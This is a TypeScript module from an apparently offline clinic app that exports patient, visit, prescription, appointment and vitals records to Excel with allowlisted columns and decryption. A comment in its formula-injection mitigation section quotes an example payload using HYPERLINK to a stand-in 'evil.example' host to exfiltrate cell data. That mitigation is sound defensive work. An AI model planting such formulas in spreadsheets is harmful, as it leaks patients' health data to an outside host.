/**
 * Daily report export — pure client-side, runs entirely from the Dexie
 * offline DB. No API calls, works on a plane.
 *
 * exportDailyReport(date) reads the offline DB for a single calendar day,
 * strips internal sync fields and any aadhaar columns, and triggers a
 * browser download of `Kaagazy_Report_YYYY-MM-DD.xlsx`.
 *
 * Privacy contract:
 *   - sync_status, version, local_updated_at, sync_version are NEVER exported
 *   - aadhaar_number / aadhar_number is NEVER exported (defensive — the field
 *     isn't currently in the client cache, but we strip both spellings in
 *     case future schema changes add it)
 *   - Doctors only see clinical columns
 *
 * Each sheet uses a per-entity field allowlist (safer than denylist).
 */

// Using xlsx-js-style — maintained fork of SheetJS that is published on npm
// and patched against CVE-2023-30533 (prototype pollution affecting xlsx@<0.19.3).
// Drop-in API-compatible replacement.
import * as XLSX from "xlsx-js-style";

import { db } from "../db/schema";
import type {
  AppointmentRecord,
  PatientRecord,
  PrescriptionRecord,
  VisitRecord,
  VitalsRecord,
} from "../db/db.types";
import { unwrapFromStorage } from "../db/encryption-bridge";

// ─── Public API ──────────────────────────────────────────────────────────────

export interface ExportResult {
  success:  boolean;
  reason?:  "no_activity" | "too_old";
  filename?: string;
}

export const REPORT_RETENTION_DAYS = 30;

/**
 * Build and download an Excel report for `date`. Returns a result describing
 * whether the file was written; callers handle UX (toast / redirect).
 */
export async function exportDailyReport(date: Date): Promise<ExportResult> {
  if (isOlderThanRetention(date)) {
    return { success: false, reason: "too_old" };
  }
  return buildAndDownloadReport(
    dayBounds(date),
    `Kaagazy_Report_${formatDateForFilename(date)}.xlsx`,
  );
}

/**
 * Build and download a single Excel backup covering the last
 * REPORT_RETENTION_DAYS (30) days — the offline retention window. Used by
 * Settings → Backup & Restore. Same column allowlists, decryption and
 * formula-injection sanitization as the daily report.
 */
export async function exportBackup(): Promise<ExportResult> {
  return buildAndDownloadReport(
    lastNDaysBounds(REPORT_RETENTION_DAYS),
    `Kaagazy_Backup_${formatDateForFilename(new Date())}.xlsx`,
  );
}

interface ReportBounds {
  startISO: string;
  endISO: string;
  startOfDayMs: number;
  endOfDayMs: number;
}

async function buildAndDownloadReport(
  bounds: ReportBounds,
  filename: string,
): Promise<ExportResult> {
  const { startISO, endISO, startOfDayMs, endOfDayMs } = bounds;

  // ── Pull per-entity rows for the window, then decrypt ──
  // Dexie tables store encrypted OnDisk envelopes. Fetch raw, decrypt, then
  // filter — encrypted fields (prescribed_at, recorded_at) can't be queried
  // as Dexie indexes; plaintext-indexed fields (visit_date, appointment_date)
  // still allow range queries to limit the scan before decryption.
  const [rawPatients, rawVisits, rawPrescriptions, rawAppointments, rawVitals] =
    await Promise.all([
      db.patients
        .filter(p => withinDay(p.local_updated_at, startOfDayMs, endOfDayMs))
        .toArray(),
      db.visits
        .where("visit_date").between(startISO, endISO, true, false)
        .toArray(),
      db.prescriptions.toArray(),
      db.appointments
        .where("appointment_date").between(startISO.slice(0, 10), endISO.slice(0, 10), true, false)
        .toArray(),
      db.vitals.toArray(),
    ]);

  const decrypt = <T>(r: unknown) =>
    unwrapFromStorage<T>(r as Record<string, unknown>);

  const [patients, visits, prescriptions, appointments, vitals] = await Promise.all([
    Promise.all(rawPatients.map(r => decrypt<PatientRecord>(r))),
    Promise.all(rawVisits.map(r => decrypt<VisitRecord>(r))),
    Promise.all(rawPrescriptions.map(r => decrypt<PrescriptionRecord>(r)))
      .then(rs => rs.filter(p => withinDay(p.prescribed_at, startOfDayMs, endOfDayMs))),
    Promise.all(rawAppointments.map(r => decrypt<AppointmentRecord>(r))),
    Promise.all(rawVitals.map(r => decrypt<VitalsRecord>(r)))
      .then(rs => rs.filter(v => withinDay(v.recorded_at, startOfDayMs, endOfDayMs))),
  ]);

  // ── Build sheets (only non-empty ones) ──
  // Every row passes through sanitizeRow() to defuse CSV/formula-injection:
  // a PHI field that starts with `=`, `+`, `-`, `@`, tab, or CR would otherwise
  // be interpreted as a formula by Excel/LibreOffice/Sheets on file open
  // (CWE-1236). Mitigation: prefix the offending cell with a single quote.
  const sheets: Array<{ name: string; rows: Record<string, unknown>[] }> = [];

  if (patients.length      > 0) sheets.push({ name: "Patients",      rows: patients.map(p => sanitizeRow(toPatientRow(p))) });
  if (visits.length        > 0) sheets.push({ name: "Visits",        rows: visits.map(v => sanitizeRow(toVisitRow(v))) });
  if (prescriptions.length > 0) sheets.push({ name: "Prescriptions", rows: prescriptions.map(p => sanitizeRow(toPrescriptionRow(p))) });
  if (appointments.length  > 0) sheets.push({ name: "Appointments",  rows: appointments.map(a => sanitizeRow(toAppointmentRow(a))) });
  if (vitals.length        > 0) sheets.push({ name: "Vitals",        rows: vitals.map(v => sanitizeRow(toVitalsRow(v))) });

  if (sheets.length === 0) {
    return { success: false, reason: "no_activity" };
  }

  // ── Build workbook + trigger download ──
  const workbook = XLSX.utils.book_new();
  for (const { name, rows } of sheets) {
    const ws = XLSX.utils.json_to_sheet(rows);
    XLSX.utils.book_append_sheet(workbook, ws, name);
  }

  XLSX.writeFile(workbook, filename);   // SheetJS handles Blob + anchor download

  return { success: true, filename };
}

// ─── Date helpers ────────────────────────────────────────────────────────────

function dayBounds(date: Date) {
  const start = new Date(date); start.setHours(0, 0, 0, 0);
  const end   = new Date(date); end.setHours(24, 0, 0, 0);
  return {
    startISO:     start.toISOString(),
    endISO:       end.toISOString(),
    startOfDayMs: start.getTime(),
    endOfDayMs:   end.getTime(),
  };
}

/** Window covering the last `days` calendar days through the end of today —
 *  start of (today - days) to end of today. Used by the 30-day backup. */
function lastNDaysBounds(days: number) {
  const start = new Date(); start.setHours(0, 0, 0, 0); start.setDate(start.getDate() - days);
  const end   = new Date(); end.setHours(24, 0, 0, 0);
  return {
    startISO:     start.toISOString(),
    endISO:       end.toISOString(),
    startOfDayMs: start.getTime(),
    endOfDayMs:   end.getTime(),
  };
}

function withinDay(iso: string | undefined, startMs: number, endMs: number): boolean {
  if (!iso) return false;
  const t = new Date(iso).getTime();
  return t >= startMs && t < endMs;
}

function isOlderThanRetention(date: Date): boolean {
  const cutoff = new Date();
  cutoff.setHours(0, 0, 0, 0);
  cutoff.setDate(cutoff.getDate() - REPORT_RETENTION_DAYS);
  return date.getTime() < cutoff.getTime();
}

function formatDateForFilename(d: Date): string {
  const pad = (n: number) => String(n).padStart(2, "0");
  return `${d.getFullYear()}-${pad(d.getMonth() + 1)}-${pad(d.getDate())}`;
}

// ─── CSV / formula-injection mitigation ──────────────────────────────────────
//
// Excel, LibreOffice Calc, and Google Sheets all interpret a cell whose value
// starts with `=`, `+`, `-`, `@`, tab, or carriage return as a formula on file
// open. A PHI field containing user-entered text could carry a payload like
// `=HYPERLINK("evil.example/?x="&A1)` — opening the report would exfiltrate
// neighbouring cells or pop a dialog. CWE-1236.
//
// Mitigation: prefix any string cell whose first character matches the danger
// set with a single quote `'` — Excel treats the cell as literal text and
// drops the leading quote on display. Numbers and other types pass through.

const FORMULA_PREFIX = /^[=+\-@\t\r]/;

function sanitizeCell(value: unknown): unknown {
  if (typeof value !== "string") return value;
  return FORMULA_PREFIX.test(value) ? `'${value}` : value;
}

function sanitizeRow<T extends Record<string, unknown>>(row: T): Record<string, unknown> {
  const out: Record<string, unknown> = {};
  for (const [key, value] of Object.entries(row)) {
    out[key] = sanitizeCell(value);
  }
  return out;
}

// ─── Per-entity row builders (explicit allowlist of clinical columns) ────────
//
// Anything not listed here is automatically excluded — including sync_status,
// version, local_updated_at, sync_version, device_id, last_synced_at,
// pdf_s3_key, photo_s3_key, aadhaar_number / aadhar_number, etc.

function toPatientRow(p: PatientRecord) {
  return {
    "Patient ID":     p.patient_id,
    "Patient No":     p.patient_no ?? "",
    "First Name":     p.first_name,
    "Last Name":      p.last_name,
    "Date of Birth":  p.date_of_birth,
    "Gender":         p.gender,
    "Contact Number": p.contact_number,
    "Blood Group":    p.blood_group ?? "",
    "Marital Status": p.marital_status ?? "",
    "Occupation":     p.occupation ?? "",
    "Company":        p.company ?? "",
  };
}

function toVisitRow(v: VisitRecord) {
  return {
    "Visit ID":          v.visit_id,
    "Patient ID":        v.patient_id,
    "Doctor ID":         v.doctor_id,
    "Visit Date":        v.visit_date,
    "Status":            v.status,
    "Chief Complaint":   v.chief_complaint   ?? "",
    "HPI":               v.history_present_illness ?? "",
    "Physical Exam":     v.physical_examination ?? "",
    "Assessment":        v.assessment        ?? "",
    "Plan":              v.plan              ?? "",
    "Notes":             v.notes             ?? "",
    "Lab Tests":         (v.lab_tests ?? []).join(", "),
    "Advice":            v.advice            ?? "",
    "AI-Generated":      v.ai_generated ? "Yes" : "No",
    "Follow-Up Date":    v.follow_up_date    ?? "",
  };
}

function toPrescriptionRow(p: PrescriptionRecord) {
  const medsSummary = (p.medications ?? [])
    .map(m => [m.name, m.dosage, m.frequency, m.duration].filter(Boolean).join(" "))
    .join("; ");
  return {
    "Prescription ID": p.prescription_id,
    "Visit ID":        p.visit_id,
    "Prescribed By":   p.prescribed_by,
    "Prescribed At":   p.prescribed_at ?? "",
    "Status":          p.status,
    "Valid Until":     p.valid_until    ?? "",
    "Medications":     medsSummary,
    "Notes":           p.notes          ?? "",
    "Observation":     p.observation    ?? "",
  };
}

function toAppointmentRow(a: AppointmentRecord) {
  return {
    "Appointment ID":   a.appointment_id,
    "Patient ID":       a.patient_id,
    "Doctor ID":        a.doctor_id,
    "Appointment Date": a.appointment_date,
    "Start Time":       a.start_time,
    "End Time":         a.end_time      ?? "",
    "Status":           a.status,
    "Reason":           a.reason        ?? "",
    "Notes":            a.notes         ?? "",
  };
}

function toVitalsRow(v: VitalsRecord) {
  const bp =
    v.blood_pressure_systolic != null && v.blood_pressure_diastolic != null
      ? `${v.blood_pressure_systolic}/${v.blood_pressure_diastolic}`
      : "";
  return {
    "Vital ID":         v.vital_id,
    "Visit ID":         v.visit_id,
    "Recorded At":      v.recorded_at ?? "",
    "Blood Pressure":   bp,
    "Heart Rate":       v.heart_rate          ?? "",
    "Respiratory Rate": v.respiratory_rate    ?? "",
    "Temperature":      v.temperature != null ? `${v.temperature} ${v.temperature_unit ?? ""}`.trim() : "",
    "SpO2":             v.oxygen_saturation   ?? "",
    "Weight":           v.weight      != null ? `${v.weight} ${v.weight_unit ?? ""}`.trim() : "",
    "Height":           v.height      != null ? `${v.height} ${v.height_unit ?? ""}`.trim() : "",
    "BMI":              v.bmi                 ?? "",
    "Blood Sugar":      v.blood_sugar         ?? "",
  };
}
